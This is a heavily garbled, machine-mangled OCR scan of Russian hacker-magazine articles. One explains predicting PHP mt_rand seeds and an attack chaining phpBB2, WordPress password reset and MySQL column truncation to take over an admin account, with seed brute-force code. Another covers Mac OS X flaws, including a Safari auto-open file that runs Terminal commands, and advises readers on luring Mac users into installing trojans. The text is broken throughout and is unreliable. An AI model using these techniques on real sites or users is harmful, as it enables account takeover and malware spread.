накануне 0 0000000. В итоге, получаем на  брутфорса всегда ведь но число: ото 000000 перед 0 0000000 значений. При 0000000  значений движение брутфорса сида займет просто-напросто изрядно секунд!   □ КЕЕР-АЫѴЕ СОЕДИНЕНИЯ   Материал был бы бесполезным, разве бы никак не оный факт, в чем дело? Кеер-аііѵе  НТТР-соединения вечно обслуживаются одним равным образом тем а процес-  сом сверху удаленном веб-сервере! Это означает, который зееб, сгенериро-  ванный всего одиночный раз в одном домене сего сервера, полноте таким а равным образом с целью другого домена нате этом сервере! То есть, даже если какой-либо рбр-  скрипт вам ведет сгенерированные случайные числа, ты да я сможем предназначить согласно ним сид, — равным образом прочие случайные числа генерить бери его основе! Правило, какты еще понял, относится нетолько для  одному хосту, а равно ко во всех отношениях хостам возьми удаленном сервере. Нельзя далеко не  заметить, что такое? сие действует всего-навсего интересах РНР, запущенного во вкусе мо-  дуль Апача, а видишь интересах сді генераторы псевдослучайных чисел ввек  будут начаться заново. Но сді, скорее, устранение изо  правил, круглым счетом сколько невыгодный будем захватывать его во расчет. Кстати, Стефан Эссер  подсказал после этого хи нт. Если твоя милость хостишься для одном сервере из жертвой, в таком случае можешь по принуждению впустить скрипт бери своем хосте  со згапй( 0) не ведь — не то тЕ_згапй( 0 ) . Сидужертвы будет, соответственно, 0 :).   Ей ОТ ТЕОРИИ К ПРАКТИКЕ   Настало миг распространить по сию пору сказанное. Итак, запусти ниженазванный  скрипт:   <?рЬр   тб_згапй(31337) ;  ргіпЬ тС_гапй ( ) . " \п" ;  ргіпЬ тС_гапй ( ) . " \п" ;  ргіпЬ тб_гапй ( ) . " \п" ;  ргіпС тр_гапй ( ) ;   ?>   При каждом выводе тб_гапй ( ) тебе будут показаны птицы одного полета чис-  ла, беспричинно в качестве кого 0ееб во всех направлениях безраздельно равно оный же. Теперь следовать пусти непохожий скрипт:   <?рЬр   ргіпЬ гапй () . " \п" ;  ргіпС гапй ( ) ;   ?>   Допустим, твоя милость получил числа 0 0834 равным образом 0795. Снова запускай известный код, так сегодня во качестве сида укажи суп получившееся число:   <?рЪр   згапй ( 01834 ) ;  ргіпЬ гапй () . " \п" ;  ргіпй гапй ( ) ;   ?>   В итоге твоя милость получишь числа 0795 да 08744.   Обрати подчеркнуть что получи и распишись следующий окончание :]. Эту свойство  генератора обнаружил газОг (ссылки нате его адвисори глякось в  врезке).     ХАКЕР 01 /119/ 08       (О 0»б№№ ;ір4ш С - I Р *івП>, :нѵ Р ОСИ гг" .      ; ПЬкинь : 00 спря и*™ из касательно   ■ НарнаочИМнаИ - ІЖКМѴ* ЯТІММІ воздержанность   Сррг*рч*ац п* ЙНИШС НвГ     Т      ю    ІР.РГ ІПфІІ    кімі_рм«і      У    1      прога * зКйы влияние «жвзсеялк    ■   л    У    3    аОпмі    Я I « і7»і9е25Э«^1 ГЙЖ1И5І «7     Т ОІѢІГ"ГЛІЬ ЬГЧ I • •’<• №>,_• Г • ■•• : С ЙЙ М 0ДіРІИ і < п ц ^ У   ГЬрэЗПЪі 00 СГ |^1 ніжиіі С О   Н глрнилкгііьньи * («««к . №«№ ПОСТ   гНсЙНЛкІРѴ"ІПН" |‘Г Ѵ»™к’-«гпр ь.|Р|"‘>->   I , УБИРАЛ» игіш ^ 0*рскя 0Ы начни (лынрсг.ні| Ц Ірпіі   И мускула асітіп равно асІтіп[55 пробелов] равны   Н СР055 АРРЫСАТІОЫ АТТАСК5   Некоторые веб-приложения самочки инициализируютзееб, а после выводят  полученные возьми его основе псевдослучайные числа конечному пользова-  телю. Пример та кого приложения — рЬрВВ2. Вот адрес изо зеагсЬ.рЬр:   тб_згапй ( (йоиЫе) тісгобітеО * 0000000);   $зеагсЪ_ій=тб_гапй ( ) ;   Проблема на этом примере заключается во том, что-нибудь величина комбинаций  составляет итого 0000000, да во Ыті-исходнике страницы я поглядим  выводзначения $зеагсЬ_ісІ. Кактыуже понял, предвидя сгенерированное  случайное число, мы, фактически, знаем равным образом веесПТем более, получи и распишись пример  1000000 результатов работы генератора от полученным $зеагсЬ_ій  уйдет ничуть одну крошку времени. Простор для того действий тута жуть большой.  Можно разработать гаіпЬо\л/-таблицы со общей сложности л вишь 0000000 значений.  Ситуация верна с целью РНР 0=> 0.2.1 .А во случае сРНР4иРНР5<=5.2.0 возлюбленная становится покамест лучше! Для них контингент вариантов сокращается под на банан раза, так лакомиться давно 0 во 09 степени. Причинуя описал во первых  абзацах.   Ты спросишь, вследствие чего но во этом примереутечка сгенерированного числа  является проблемой безопасности? Вот почему:   1.3а прием генератора случайных чисел влияет далеко не только лишь держи представлен-  ный на примере рЬрВВ2, да равно получи и распишись прочие веб-приложения.установлен-  ные получи и распишись этом сервере;   2. Псевдослучайные числа, сгенерированные для основе предыдущего  веесі, будутпредсказуемыми;   3. Остальные приложения в этом а сервере могут строить пароли,  сессии ит.д. для основе полученного досель веесі.   Теперь рассмотрим ситуацию, в отдельных случаях рЬрВВ2 равно милай мной ѴѴогсІРгезз  установлены получи одном сервере. Отталкиваясь ото полученной повыше ин-  формации, Стефан описываеттакой алгорифм атаки для веб-приложения  [Сгозв Арріісаііоп Аііаскв):   1. Запускаем кеер-а Ііѵе конкатенация ко поиску рбрВВ2 равным образом ищем что бог на душу положит нередко встречающееся слово, чаятельно «а», «ІЬе» равным образом т.д ;     Ссылки по части теме :   • Ьир:/Аѵтѵ.5изрекбог8/2008/08/17/тІ: згаті-апсі-поі-зо-  гапйот-питЬегз — оригинальное айѵізогу Стефана Эссера в тему  ті_гапс10   • Ьар:/Ауѵуѵѵ.5изрекбогг/2008/08/18/тѵ5д1-апс1-5д1-со1итп-  ггипсагіоп-ѵиІпегаЬіІігіез — Му5<2Ь апсі 0(Д Соіитп Тгипсаііоп  ѴиІпегаЬіІіІіез   • Ьир : / /тіЬѵОгт.сот/ехрІоіІз /6421 — ѴѴогсІргезз 0.6.1 (5<2Ь  Соіитп Тгипсаііоп) Асітіп Такеоѵег Ехріоіі   • Ьар : / /гагОг.пате Аѵр-сопіепі/иріоасіз /2008 /08 Лѵрі .Ьіті   — ѴѴогсІргезз 0.5 <=2.6.1 0Ьгои§ЬрЬрВВ2 Кезеі Айтіп РаззѵѵопЗ  Ехріоіі   • ІіПхк / /гз.2Ог.пэгпб/згіііс1бз/ог0сІ8кз.2ѵѵэсгп-з1ііс]ішпѵс-с1ііз1э.-ѵ-о]іс   — разыскание гагОг’а нате тему предсказуемости случайных чисел  вті_гапс10   • Ьир : / /гагОг.пате /ѴиІпегаЬіІіІіез /заі-соіитп-ігипсаііоп-зесигііѵ   — зондирование гагОг’а для тему усечения данных во МуЗС^Ь   • Ьар : / /гагОг.пате /агіісіез / таеіѵа-зІисЬаіпѵх-сЫзеІ-сЬазс-2   — изыскание гагОг’а возьми тему предсказуемости случайных чисел  вгапсІО   • Ьар : / /гагОг.пате /ѴиІпегаЬіІіІіез / иѵагѵітозіі-ѵ-зітрІе-тасЬіпез-  Гогиш — уязвимости 0МР бери основе предсказуемости случайных  чисел     2. Если вопрос вернул побольше 00 результатов поиска, в таком случае смотрим  Ыті- исходи равным образом ко страницы. В ссылке получи и распишись следующую страницу конференция приходится отвести случайное количество во параметре зеагсбщій, — запо-  минаем его;   3. Запускаем брутфорс по мнению найденному псевдослучайному числу с  зеагсбщій интересах определения изначального веесі. Для сего гагОг  предлагает функцию -   бипсбіоп веагсЬ_зеей ( $гапй_пит) {   $тах=1000000; Зиждитель ( $зеей=0 ; $зеей<=$тах; $зеей++ ) {  тб_згапй($веей) ;   $кеу=тб_гапй ( ) ;   іб ( $кеу==$гапй_тлп) гебигп $зеей;   >   гебигп. баізе;   }   4.3апускаем тб_згапй() вместе с полученным значением зеей да отбрасы-  ваем первоечисло — оный самый зеагсЬ_ій;   5. В фолиант но кеер-а Ііѵе соединении отправляем вопрос получай смену пароля  админа блога;   6. На основе полученного сида генерируем случайное цифра в целях акти-  вационного ключа смены пароля, какой блог полагается был изгнать бери сериал админа;   7. Снова совершенно втом а кеер-аііѵе соединении переходим по мнению сгенери-  рованной эксплойтом активационной ссылке. Это следует дать повод для  смене пароля администратора;   3. Генерируем фраза пирушка а функцией, от через которой  получили активационный ключ, равно заходим во админскую кусок  ѴѴогсІРгевв :]. Кстати, неравно получай сервере-жертве нужно РНР 0 либо  РНР 0 <=5.2.0, так нелишне пробуждать псевдослучайные  числа в пирушка но версии РНР; так а самое относится да для РНР 0 >=5.2.1.   Эксплойт, основанный сверху этом алгоритме, написал всетотже гагОг  Ссылку смотри у меня вот врезке.     ► о     ХАКЕР 01 /119/ 08 хакинг     5 . 0 . 0.5      Поискв рНрВВ2     Н СНОВА ѴѴ0КРРКЕ55   Попробуем приспеть копи санной уязвимости вместе с иной стороны равно рас- стремлять концевой эксплойт пользу кого ѴѴогсІРгевв, вышесказанный ѴѴогбргевв  2.6.1 (БСИ-СоІитпТгипсаііоп) Абтіп Такеоѵег Ехріоіб. Алгоритм экс-  плойта основан разом в двух глобальных уязвимостях: на, собственно,  предсказуемости псевдослучайных чисел да получи и распишись 00І_СоІитпТгипса(іоп  — усечении данных на Му5С!І_.   Сделаю небольшое лиценция равно расскажу об этом пресловутом усече-  нии данных во мускуле. Уже именитый тебе Стефан Эссер опубликовал на  своем блоге очередную асіѵівогу, посвященную новой уязвимости. Она  связана вместе с особенностями сравнения строки а втомати веского усечения  данных во Му5С1І_. Известно, почто какой приглянется колоночка на таблице имеет опреде-  ленную длину. Допустим, существует равнина ѵагсбаг(бО) (как во ѴѴогсІРгевв  <=2.6.1 чтобы логина пользователя). Что будет, ежели занести на сие закраина что ни попадя значение, которое превыситобозначенные 00 символов?Лиш-  ние символы отсекутся! В луг останутся первые 00 символов, которые я попыталисьтуда записать. Дальше. Если у нас глотать поляна на базе  данных со значением «абтіп», да наш брат попытаемся сверить сие значение,  например,  со «абтіп » (абтіп равно 0 пробела), в таком случае мышца сие проделает да  скажет, в чем дело? полина равны. Эта характерная черта Му50І_ работает во дефолтной  конфигурации, — что такое? открывает свежий градиент атаки получи веб-приложения!  Подробнее касательно уязвимости советую просмотреть объединение адресам, указанным на  сноске. Но вернемся для нашему эксплойту.   Принцип его работы изложен ниже:   1. Регистрируем нового пользователя слогином абтіп[55 пробелов]х.  Далее заключительный мандала «х» отсекается, равным образом во базе наша сестра получаем пользо-  вателя абтіп из 05 пробелами, аюшки? интересах мускула в конечном счете короче непропорционально  простологину«асІтіп»;   2. Запрашиваем линк сброса пароля для свое мылодрама равно получаем уни-  кальный треншальтер с параметра кеу, какой-никакой был сгенерирован функцией   тб_гапй ( ) :   3. Сбрасываем жете значимость администратора не без; полученным ключом. В итоге, свежеиспеченный жете дело уйдет всего-навсего сверху мыльная продукция админа;   4. На основе полученного до тех пор ключа ищем си д к опять сгенериро-  ванного пароля. Тут дозволяется построить гаіпбо\л/-таблицы про поиска,  которые будут тянуть ориентировочно 0294967296 (строк, возможных значений  сида, закидон строки=веесІ) * 00 (количество символов кея для того смены  пароля)=85899345920 байт сиречь 00 гигабайт. Для версий РНР4, РНР5  <=5.2.0 да РНР 0 >=5.2.1 нужно зарождать отдельные табл равным образом цы. В экс-  плойте и очищать выполнимость обыскивать 0еесІ равно помимо применения радужных  таблиц, а процессзайметочень долгое время. Делается сие следующей  функцией:   бипсбіоп дебзеей ( $гезебкеу ) {   есЬо " [-] саісиіабіпд гапй зеей Тог $гезебкеу (бМз  мііі баке а Іооопд біте) " ;   $тах=рои (2, (32-ВТГБОУ) ) ;   Тог ( $х=0 ; $х<=$тах; $х++) {   $зеей=ВНЕСУ ? ($х « 0) +1 : $х;  тб_згапй ( $зеей) ;   $безбкеу=ир_депегабе_раззиогй (20 , Таізе) ;      ѴѴОІШРКЕЗБ     ***** ѵпиг ітгр-мі гГ «*т4ІІ  цззгіг» Ѵфд міі гсіеіѵі- а гч .-* р-инмогеі  ѴІ* *‘*л * I     ІІтп тчп*ч «" К »лчі|        Рви(ха|     : 0 • 0 0 м " - •     н     ма восстановления шаг     роля во ѴѴогсІРгевв     ІТ ( $безбкеу==$гезебкеу ) {  есбю " о\п" ; гебигп $зеей;     ІТ ( I ( $х % 00000) ) есбю " . " ;     есЬо " \п" ;  гебигп Таізе;     }     Параметр ВІІ66У — отнюдь не почто иное, каквышеописанный баг, когда-когда 06 пос-  ледних двоичный знак сида становятся равными нулю, так лакомиться количество всех значений пользу кого перебора короче равным 0 во 01 степени. Вычисляется серьёзность  генератора так:   тб_згапй(2) ; $а=тб_гапй() ; тб_згапй(3) ; $Ь=тб_  гапй ( ) ;   йеТіпе ( "ВШЕУ , $а==$Ь) ;     Изучив исходник сего эксплойта, твоя милость сможешь больше со всеми подробностями войти в подробности на естество уязвимостей, найденных Втефаном Эссером.   Пока аюшки? эксплойты бери вышеописанных багах никак не весть распростра-  нены. Я думаю, сие через того, что-нибудь ради многих подчинение уяз-  вимостей генераторов псевдослучайных чисел может явиться чрезмерно сложной. На самом деле, сие отнюдь не так. Хакеру моя персона посоветовал  бы одолеть исходники эксплойтов, ссылки получай которые принимать на сноске, равным образом начертать сверху основе полученной информации домашние мегапробив-  ные релизы. А на админов да без труда юзеров — возобновить особый РНР поперед последней версии да выставить ЭиЬовіп-патч с Втефана Эссера.  Вооб [иск! ЗС     ХАКЕР 01 /119/ 08     ► обі взламывание     ЯБЛОКО!   РАЗДОРА     Самое уязвимое луг на какой приглянется системе — сие плохо разобравшийся во     ОСНОВНЫЕ ДЕФЕКТЫ МАС05Х                   ПОЛУМРАК^!      РОШМНАК по отношению МЕ.СОМ /|       ней пользователь. Ни один, ажно самый хитроумный, эксплойт малограмотный наделал  столько бед, насколько наивная вероучение людей, что такое? кто-нибудь прислал им фотография голой  Курниковой. Хорошо подготовившийся юзер ловок дать повод характеристичный конторский ПК во неработоспособное имущество на среднем следовать 05-20 минут далеко не беда интенсивного веб-серфинга. И МасОЗ X после этого неграмотный исключение.     омпьютерная опасение представляет внешне извест-  ную «уловку-22»: нежели хитроумнее равным образом надежнее конструкция  защиты, тем чище вероятность, аюшки? возлюбленный короче мигом  отключен. Сложные пароли быстрее попадают получай бумажку,  открываемые в области снимку сетчатки двери сразуже подпираюттабуретом  (не напасешься сетчатки весь промежуток времени открывать-закрывать). Чем полезнее  становится замонтированный файрвол ѴѴІпсІоѵѵв.тем быстрее его отключит  сдавшийся пользователь, неграмотный сумевший понудить программу упускать  торренты не без; голыми отпечаток Курниковой.   В общем, точность компьютерной системы — бери протяжении некото-  рого отрезка времени — хорэ уцелеть ориентировочно одинаковой, насколько  бы усилий неграмотный было предпринято ради ее компрометации или, наоборот, в какой мере бы строгих специалистов невыгодный было бы брошено нате ее защиту.   Если междухакером равно инженером сидит инициативный человекизтеплого мяса,  со руками, ногами равно во всех отношениях таким — возлюбленный короче взимать для себя занятие буфера.  Поэтому аж на высший самой мощной эпидемии никак не наступает коллапса:  обеспокоенные пользователи предприимчиво начнут помещать патчи равно пользо-  ваться специализированными инструментами. Помнишьэпидемию  «ІІ_оѵеѴои»? Программка с целью его удаления была бери флешке у каждого  второго. Каждый незаинтересованный научился отключать его руками. Все выучили  аббревиатуру КРС, некоторые люди хоть поняли — аюшки? сие такое.   И, разумеется, буде производчик начнет умножать точка ради щиты, ведь систематически юзер расслабится — на фигища напрягаться, коли после тебя сие поуже  сделали? Кто изо нас далеко не пользовался чудесным паролем «123456»? А равно как касаясь дымка подобно секретного вопроса «вопрос?» да ответа «ответ» сверху него? А как много людей используют сам сообразно себе равно оный но знак на паре, а в таком случае равно свыше мест?  Итак, через силу плохо защищенные системы заботятся что до себя сами.  Слишком здорово защищенные — наоборот, становятся жертвой      ► 0б2     ХАКЕР 01 /119/ 08          ЧІР   ► — Ч> ч *Ѵ _м«. _!**   • ш .Ішіг Ц# Щ а*і ІГ Э   л-гН.і! рекламация Чіі для ■ і.   гііТІгЛМР! Мі I I I   •-■л‘ ііі мл ,г 0 0   *■   кіш и- равно хгѵ для -ті а  р •=Ліг-иЬіх. іс  I 0Ц**-ЧЙ \Ѵ   шт.-я +■ ш | і   ■"ИИ « I ■ равно     Окжі |іп*1 Нгфпі ( ІІУ1П1 "* ■■< ц П4*«іщ|сѵ  Оіп» чнііЬіп Йч     "■ч ,:р II Ьй *т»і І "Е~ «И. ■(.’ 0. «±г.     А     Обрати интерес нате галочку наизворот Ореп «ваіеябіев. 0008 год. Для  макюзеров так же существуют «безопасные» файлы     Утилита Опв-всІ найдет все, неуклонно что Яндекс     собственной защиты. Это держи обалдайс тонкий, аж учтивый  баланс, сверху котором строится приземленно весь промышленность инфор-  мационной безопасности. Лучшая щит —та, которая отнимету  пользователя казаться столько удобства, сколечко симпатия косой передать ради  названное величина трудностей, причиненное... компьютерному  энтузиасту, заинтересовавшемуся его данными. О любом срединном  случае скорее только взвешивать по мнению соответствующим ему случаям край-  ним. Представь компьютерную систему, пользователи которой безграмотный  испытывают ни малейших проблем вместе с безопасностью. Даже неравно они безвыгодный новички, а профессиональные пользователи — в чем дело? произойдет?  Рано либо — либо запоздало ребята ста горох та ко беспечны, что такое? начнут притяги-  вать тревоги стоймя с воздуха. Мир жесток равно получи и распишись 0/4 покрыт  холодной, соленой водой, а благодаря этому систем, пользователи которых безвыгодный заботились бы по отношению безопасности ни капельки (и близ этом безграмотный получали бы  ответного пинка] невыгодный существует... Кроме, разумеется, пользователей  Мае 05 X.     В НЕМНОГО ПОЧТЕНИЯ   Как посредь макюзеров, пущай нечасто, так встречаются умудренные века-  ми, убеленные люминесцентным офисным освещением, впоследствии завтрака равно ретивое не отличить нате Столлмана, II N IX- гуру, та для равным образом самоё Мае 08Х малограмотный так  проста, во вкусе кажется. Это очень, ахти бабушка система. Кажется, моя особа об  этом уж говорил — в сих но страницах, некоторое миг назад? Та для  вот, помоложе возлюбленная вместе с тех пор отнюдь не стала. Тут безвыгодный «ядро РгееВ50 не без; графической  оболочкой», на правах считают неграмотные люди, а основанная сверху ядре МасЬ  операционная строй не без; собственной богатой историей, традициями,  собственными шизофрениями равным образом неграмотный разрешаемыми согласно двадцатьлет  багами. Начало свое симпатия беретик через ЫехіВіер 0.9, которая была выпущена на  далеком 0 088 году.   Конечно, 0988 година — нетакужи далек с нас, а представьте, почто равным образом тут теория науди влениемалоотличаласьотнынешней Мас05Х. Этобыл необходимый ІІІМІХс настоящей многозадачностью равно всеми делами. В об-  щем, Мае 05 X— далеко не маргинальная концепция неясного назначения! У нее лакомиться история, очищать равным образом цель. Инженеры Арріе по старинке предпочитают творить ее на соответствии со всеми возможными открытыми стандар-  тами, только и знает получи и распишись основе открытого ПО (начиная из Арасбе, Регі, РуіНоп да РиЬу да заканчивая ѴѴеЬКІІ, дсс да если разобраться хп да — тем самым ядром  Масб; если бы бы оно было закрытым, отнюдь не было бы ника кихХакинтошей). Тут неграмотный прямое утилизация чужого труда, а отношение во нем, крыша равным образом  совместная польза.   Опять же, Мае 05Х безвыгодный столько идеальна, с тем пользователи могли безвыгодный держать ни малейшего представления в рассуждении ее работе. Все-таки, сие опера-  ционная система, а отнюдь не сотканная с ветра мечта. Разработчики Мае 05  X ступают негулко, разговаривают негромко, черты лица их приятны равным образом милы,  а лбы высоки равным образом полны мыслей. До что такое? сие довело их пользователей?  Сейчас разберемся!   В НЕМНОГО НЕПОЧТИТЕЛЬНОСТИ   От Мае 05Х многие никак не на восторге, равно макюзеров многие нелюбят. И ради ась? наслюбить? Большинство макюзеров — вздорные мальчишки равным образом  девчонки, гордящиеся своими пластиковыми игрушечными компью-  териками равным образом телефончика ми. Конечно, Мае 05 X — доктрина ради идиотов  (иначе бы мы ею да никак не пользовался] равным образом нытиков, неспособных преодолеть  со  настоящей дельный операционной системой. Настоящим мужикам симпатия  неинтересна. Настоящих мужчин интересуют машины, туристические  походы равно политика!   Пользователи Мае 05 X пребывают — аз многогрешный безграмотный шучу — на счастливом неведе-  нии в рассуждении том, что-нибудь во мире существуют вирусы, трояны, фишинги в такой мере далее.  Мае 05 X находится во опасном дисбалансе — рядом отсутствии реальных  (то снедать видимых, осязаемых) угроз ее разработчики сверх меры бесчисленно  времени тратят для безопасность.   Ну, смотри кому нужны на Мае 05 X «АС Б»? Кто планировал ко серверу не без; Мае 05  X примазываться за протоколу Арріе Рііе Ргоіосоі, за исключением кучки дизайнеров да верстальщиков? Зачем в дальнейшем промышленное зашифрование сумме без исключения  128-битными ключами, семикратное уничтожение «Корзины» случайным  набором нулей да единиц?   В итоге, ноне всему остальному миру достаются бушующие вирусные  эпидемии, приносящие несметное число долларов убытка... — посмотрим, в чем дело?  достается макюзерам.   Где-то на феврале 0006 лета соответственно блогосфере прокатилась шокирующая обнова — на 0а1агі обнаружена серьезнейшая уязвимость. Если людишки  скачивали, приняв ради безвредный ЭРЕЭ, специальным образом разработанный файл, дьявол запускал Тегтіпаі.арр (приложение для того  доступа ко командной строке вследствие ВІІІ] равным образом выполнял обоссанный на  нем план (на Ьазб, руІНоп, нежели угодно]. Уязвимость демонстри-     ХАКЕР 01 /119/ 08     ► Обз       роваласьустрашающим образом — обложка скачивался да единолично запускался! Многие испугались.   Давай компактно разберем ядро уязви мости. В Мае 05 X сущест-  вует порядочно способов определения, каким приложением хорош открытфайл, а не в чем дело? иное —три.   Первый средство — незамысловатое расширение, которое  ассоциировано вместе с некоторым приложением в соответствии с умолчанию  [Забагі в целях .Ыті, ІТипев ради .гпрЗ следственно далее).   Второй сноровка — ярлык создателя,™ снедать программы, на которой обложка  был создан иначе сохранен. При решении, ась? вытворять быть запуске файла,  этотспособ значительнее предыдущего.   Третий манера — выставленная с заранее обдуманным намерением пользу кого файла преференция: ка-  ким приложением его открывать. Посмотри получи и распишись скриншот. Я создал незначимый  текстовый обложка рЬобоДрд, по времени при помощи 0111 ассоциировал его сТегтіпаІ.   У него появляется новое характер (гевоигсебэгк) — во нем хранится сведения что до том, каким приложением ваш покорнейший слуга желаю в будущем отмыкать текущий  файл. Поле называется ивго (ивегорііоп), присовокупление — /Арріісабопв/  Шііібіев/Тегтіпаіарр (в ивго прописывается отрешенный тракт для при-  ложению). Файл старым порядком определяется по образу ЧРЕ6. Если автор запущу  его двойным кликом — симпатия откроется вТегтіпаІ.арр да склифосовский исполнен.  Ревой гее Рогк хранится прямо во самом файле всего-навсего для томе из файловой системой НР5+ (системной ФС Мае 05Х). Если зачислить обложка стем но ивго получи и распишись книга из РАТ32 иначе ІЮР другими словами сдавить его архиватором, отнюдь не  поддерживающим гевоигсеФгк (то есть, любым, выключая 0іиШ), он, тем невыгодный  менее, сохранится — на виде кучки скрытых файлов равным образом папок. Таким обра-  зом, вилку ресурсов — равным образом нива ивго — дозволяется давать из одного Мака держи  другой, поместив файл, скажем, во зір-архив.   В веб-браузере 0эІагі поглощать опция — позже скачивания механически  открывать«безопзсные» файлы. Безопасными файлами наивная Арріе  считает видео-, аудио-, РОР-файлы, картинки равно текстовые документы, а да образы дисков да иные архивы. Образы дисков — сие неоригинальный дорога распространения ПО про Мае 05 X (файлы из расширением б тд  (сіізк ітаде), которые в области клику монтируются да релятивно безопасны).   В Мае 05Х в соответствии с соображениям безопасности нетавтостарта дисков (из присутствие мерно тех но соображений кой-какие надежда таіѵѵаге к ѴѴІпбоѵѵз  записывают себя в ІІ5В-флешки совместно саиіозіагі.іпі).   Собственно, слабость заключалась на следующем: засранец скачи банкет картотека не без; фотографией внутри, 0абагі автоматом распаковывал архив,  находил в глубине файл, за расширению определял его вид как«изображе-  ние формата Ф РЕѲ», и, сочтя безопасным, открывал — используя указан-  ное приложение, /АррІісаііопв/ШШІІев/ТегтіпаІ.арр. Что, возле наличии  флага +х получай файле, приводило ко исполнению команд, записанных на этом  самом файле.   То есть, дефолтное подгонка настроек позволяло осуществлять нате компью-  терах граждан по существу все состав терминальных команд   Тем жени -ті будьтакоежелание, не грех было бы натворить много  дел. И нежели а однако закончилось? Представь, что такое? было бы, неравно бы Іпіегпеі  Ехріогег за умолчанию бессознательно открывал отдельный переписанный обложка из расширением ірд, хір другими словами трЗ. Та ко чисто — никак не случил штифт ничего! Люди  запаниковали, далее сняли галочкусэтой самой опции в5а?агі равно все.  Некоторые на скорую руку переместили Тегтіпаіарр бог знает куда до этого времени (или положительно  удалили), хотя сие была чистая паника, да смысла во поступке неграмотный было.   Так вот. Пока аз многогрешный писал статью, автор этих строк полез подвергать проверке — стоитли у меня сия  галочка. Оказалось, что-нибудь есть расчет — вдобавок, только лишь в чем дело? докачавший-     > ■ ■ Ъиі ртіісЬіп т пГГ Гйр II- і     Іѵі йч Л     РІІеѴаиК надежен, кактанк, равным образом почти что никак не отличается через него скоростью равным образом манев-  ренностью около бэкапе. Увы, комфортабельность — сие такса безопасности...     ся бтд-файл собственными силами смонтировался, отнюдь не отвлекая меня через  текста. Компьютер положительно новый, а значит, симпатия в соответствии с нынешний дата достаточно вслед за тем в соответствии с  умолчанию. Но что изменилось! Я отправил обложка самомусебе до  почте, скачал — 0абагі автоматично распаковал рНоіоц"рд на мою папку  0о\л/п1оабз, однако отнюдь не запустил его. Когда пишущий эти строки ес сие самостоятельно (голые фотография Кур-  никовой!), учение сообщила — рНоІоцрд можетбыть приложением, спирт  был скачан изо интернета да бросьте открыт во Терминале. Уверен ли я?  Конечно, похоть ко Курниковой может состоять безграничным да постоянно  найдутся люди, которые нажмут кнопку «О К», особенно ежели обложка им  пришлет кто-нибудь ведомый — хотя сие отнюдь не одно равным образом ведь же...   В ПРАКТИКА РАБОТЫ С МАКЮЗЕРОМ   Итак, Мае 05 X, равно как совершенно системы, особенно уязвима со стороны  пользователя. Некоторые нововведения во области безопасности, во частности, выражаются втом, почто пользователю придется произносить  всплывающие окна. Почему сие имеет значение? Дело во том, что-то сие да убирать на действии та самая «уловка-22», относительно которой мы приблизительно целый ряд говорил.  Чем безопаснее пытается оказываться система, тем сильнее вовлечения каста опасение требует с человека. Появление таких окошек воспрещается отключить — однако их ахти несложно игнорировать. Нет дрянной внутренние резервы постановить эту задачу не то — тогда заключать свободу  владельца компьютера нельзя!   И — второе. Мае 05Х находится на как собака невыгодном положении. Не-  большая рыночная доза лишает ее далеко не лишь коммерческого внимания   — вышел никакого смысла ломиться нате славно защищенные Маки, эпизодически  дырявых РС эдак много. Но возлюбленная лишена да академического внимания: согласно  различным причинам (очень нравится, жуть безграмотный нравится, естьзанятия  поинтересней) ее часто игнорирует накипь информационной безопас-  ности. А гляди сие сейчас плохо, благодаря этому что-нибудь вселяет на инженеров равным образом пользовате-  лей наитие ложной безопасности.   Третье. Это очень, адски дружелюбная система. Ее первый знак   — «просто работает». Если для Маку ввести принтер, возлюбленный появится на  списке принтеров. ОС аж сериальный стриптиз далеко не спрашивает около уста-  новке — каковой серийник, дружище, твоя милость уж купил/купила Мак, конечно,  тебе положена Мае 05Х, пользуйся, радуйся! Следовательно, общественный порядок  предпочитаетлишний единожды далеко не сосредотачивать пользователя равно всеми силами  избегаетзагадочных, необъяснимых глюков (такиелюбитустраивать  файрвол ѴѴІпбоѵѵз, например). Макюзеры аллегро привыкают, что-то 09%  вещей происходят самостоятельно, лишенный чего ихучастия [и лишенный чего их, во томище  числе, ошибок, — Прим. РогЬ).   Что подобает изо сих трех пунктов? Если пользователи системы привыкли сводить счеты ее безопасной равно неграмотный привыкли кограничениям да вопросам — зна-  чит, спокон века допускается встретить образ высасывать кровь особенно пользователя.  Поэтому я неотложно пройдемся в соответствии с потенциально опасным способам  взаимодействия вместе с системой, разберем до некоторой степени полезных пунктов, а а там решим — какзащитить являющийся личной собственностью Макинтош (или Хаки нтош) через  внимания со стороны друзей равно коллег.     ► 064     ХАКЕР 01 /119/ 08      Тл ЩГ Ик|Ѵ«+ЕН17И<Г«»»     В СНОВА ВИЛКА   Сначала кратких закончим замереть самой вилкой ресурсов — Мае 05 X 00.5  используетее к повышения безопасности системы. Еслиты решишь использовать в своих интересах Заіагі, строй вот поэтому и есть на вилке ресурсов сохранит  информацию об том, эпизодически равным образом откуда родом твоя милость скачал настоящий файл. В случае обычных  файлов (не приложений) ко вилке ресурсов добавляется новое поляна сот.  арріе.диагапііпе, которое равно сообщает, что-то обложка был скачан с интернета.  К приложениям добавляется домицилий сайта.   Конечно, файловая защищенность безграмотный ограничивается лишь только этим, да ради  того, с намерением отослать со своего троя держи заметка касательно карантине, тебе придет-  ся поманежиться (найти ЬиЯегоѵегІІоѵѵв Ріпсіег, например). Потребуется входя во все подробности овладеть систему — равно твоя милость рискуешь сделаться макюзером.   Из сего годится — ежели пойдешь по части этому пути, тебе, вероятно, придется воздействовать социальными методами. Тебя кардинально может дожидаться фурор  — инда неравно пользователю двадцать раз в год по обещанию проявить урок верно призвать подключить лозунг (это, кстати, без чинов может датьтвоему прило-  жению услуги рута), постоянно в одинаковой степени отыщется кто-то, кто именно сделает по-твоему.  Конечно, общественный взлом — скорее, искусство, нежели наука. Тебе потребу-  ется голова программиста, дизайнера, веб-дизайнера. Придется разработать схожий получи истовый сайт, догадаться путь заверить пользователей  скачать равным образом поста свивать твое — запакованное на бтд да украшенное шикарным  артом — приложение. А главное, тебе понадобится протереться во самопроизвольно душа  Мас05Х, с намерением привередливая сверхжертва далеко не передумала держи полпути...  Примерно бадняк взад создали троян, кой распространялся имен- только та к. На тематических форумах появилась штабель 0Е0-ссылок (спама, так есть) в порносайты, которые предлагали пользователю поста- свивать супер- мега -порнокодек (иКгасобесЮОО.сІтд) на ОиіскТіте.  Установка шла чрез комплексный Іпзіаііег. После установки засранец  получал ОМЗСЬапдег — да после этого бедняга в таком случае л равно сдавал домашние пароли  отРауРаІ, либо прямо-таки смотрел рекламу, нонче отнюдь не надоедало. Скачать  цИгасобесЮОО.сІтд мне, ко сожалению, отнюдь не посчастливилось — дикие версии  троянов интересах ОБХдолго неживут— ноэто невыгодный должнотебя останавливать.  Всегда сорная былье не 